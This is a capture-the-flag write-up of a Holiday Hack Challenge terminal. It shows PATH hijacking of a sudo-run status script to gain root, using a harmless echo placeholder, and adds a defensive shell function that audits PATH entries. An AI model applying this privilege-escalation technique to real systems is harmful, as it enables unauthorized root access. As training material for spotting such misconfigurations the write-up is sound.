Neighborhood Watch Bypass
Difficulty:
Objective
Task description
Assist Kyle at the old data center with a fire alarm that just won't chill.
Kyle Parrish
If you spot a fire, let me know! I'm Kyle, and I've been around the Holiday Hack Challenge scene for years as arnydo - picked up multiple Super Honorable Mentions along the way.
When I'm not fighting fires or hunting vulnerabilities, you'll find me on a unicycle or juggling - I once showed up a professional clown with his own clubs!
My family and I love exploring those East Tennessee mountains, and honestly, geocaching teaches you a lot about finding hidden things - useful in both firefighting and hacking.
Anyway, I could use some help here. This fire alarm keeps going nuts but there's no fire. I checked.
I think someone has locked us out of the system. Can you see if you can get back in?
Hints
Path Hijacking
Be careful when writing scripts that allow regular users to run them. One thing to be wary of is not using full paths to executables...these can be hijacked.
What Are My Powers?
You know, Sudo is a REALLY powerful tool. It allows you to run executables as ROOT!!! There is even a handy switch that will tell you what powers your user has.
Solution
We need to execute the script runtoanswer as root to solve this challenge.
We can check allowed commands for the invoking user using sudo -l (see hints):
chiuser @ Dosis Neighborhood ~ $ sudo -l
Matching Defaults entries for chiuser on 7ff5c7a0bc86:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty, secure_path=/home/chiuser/bin\:/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, env_keep+="API_ENDPOINT API_PORT RESOURCE_ID HHCUSERNAME", env_keep+=PATH
User chiuser may run the following commands on 7ff5c7a0bc86:
(root) NOPASSWD: /usr/local/bin/system_status.sh
This shows us that we can run a script named system_status.sh as root. Let's have a look what this script contains:
chiuser @ Dosis Neighborhood ~/bin $ cat /usr/local/bin/system_status.sh
#!/bin/bash
echo "=== Dosis Neighborhood Fire Alarm System Status ==="
echo "Fire alarm system monitoring active..."
echo ""
echo "System resources (for alarm monitoring):"
free -h
echo -e "\nDisk usage (alarm logs and recordings):"
df -h
echo -e "\nActive fire department connections:"
w
echo -e "\nFire alarm monitoring processes:"
ps aux | grep -E "(alarm|fire|monitor|safety)" | head -5 || echo "No active fire monitoring processes detected"
echo ""
echo "Fire Safety Status: All systems operational"
echo "Emergency Response: Ready"
echo "Coverage Area: Dosis Neighborhood (all sectors)"
The script calls commands such as free and df by bare name instead of by absolute path, so it relies on the $PATH variable to locate the binaries. By creating our own malicious binary with the same name and placing it in a folder that is listed before the folder of the legitimate binary in $PATH, we can hijack the execution. Since we can execute the script as root, we can then also execute other commands as root. This is called Path Hijacking.
The $PATH variable looks as follows:
chiuser @ Dosis Neighborhood ~ $ $PATH
bash: /home/chiuser/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin: No such file or directory
We see that the bin folder in the user's home folder is checked first. Since we are logged in as that user, we can place our binary in there. Let's test this functionality with a placeholder command echo:
chiuser @ Dosis Neighborhood ~/bin $ echo "echo 'path hijack'" > free
chiuser @ Dosis Neighborhood ~/bin $ chmod +x free
chiuser @ Dosis Neighborhood ~/bin $ /usr/local/bin/system_status.sh
=== Dosis Neighborhood Fire Alarm System Status ===
Fire alarm system monitoring active...
System resources (for alarm monitoring):
path hijack
...
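A defensive check for the misconfiguration shown above, as an added example that is not part of the original write-up: audit_path (a hypothetical helper name) flags entries of a PATH or secure_path value that are relative, missing, not owned by root, or group/world-writable. It assumes GNU coreutils stat; the value audited at the end is the secure_path from the sudo -l output.

```sh
#!/bin/sh
# Added example, not part of the original write-up.
# audit_path VALUE
#   VALUE is a PATH or sudoers secure_path string. Prints "reason<TAB>entry"
#   for every entry in which a non-root user could plant a binary that a
#   root-run script would pick up through a bare command name such as `free`.
#   Exit status is 0 when nothing is flagged, 1 otherwise.
# Assumptions: GNU coreutils stat; only the entry itself is checked, not its
# parent directories.
audit_path() (
    # sudo -l prints colons escaped as "\:"; undo that before splitting.
    value=$(printf '%s' "$1" | sed 's/\\:/:/g')
    flagged=0
    IFS=:; set -f            # split on ":" only, no globbing
    set -- $value
    unset IFS; set +f
    for entry in "$@"; do
        case $entry in
            /*) ;;
            *)  # empty or relative entries resolve against the current directory
                printf 'relative\t%s\n' "${entry:-<empty>}"; flagged=1; continue ;;
        esac
        if [ ! -d "$entry" ]; then
            # whoever can create the directory controls what it contains
            printf 'missing\t%s\n' "$entry"; flagged=1; continue
        fi
        owner=$(stat -L -c '%u' "$entry")
        mode=$(stat -L -c '%a' "$entry")
        if [ "$owner" -ne 0 ]; then
            printf 'not-root-owned\t%s\n' "$entry"; flagged=1
        fi
        # leading 0 makes the mode an octal constant; 022 = group/other write
        if [ $(( 0$mode & 022 )) -ne 0 ]; then
            printf 'group/world-writable\t%s\n' "$entry"; flagged=1
        fi
    done
    [ "$flagged" -eq 0 ]
)

# secure_path value as printed in the sudo -l output above.
audit_path '/home/chiuser/bin\:/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin' || true
```

Any flagged entry is a candidate for removal from secure_path; dropping env_keep+=PATH and calling binaries by absolute path inside the script closes the same gap from the other side.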
Solution
Using Path Hijacking, we can execute the ./runtoanswer binary as root and solve the challenge:
Images
Challenge terminal.
Response
Kyle Parrish
Wow! Thank you so much! I didn't realize seudo was so powerful. Especially when misconfigured. Who knew a simple privilege escalation could unlock the whole fire safety system?
Now... will you sudo make me a sandwich?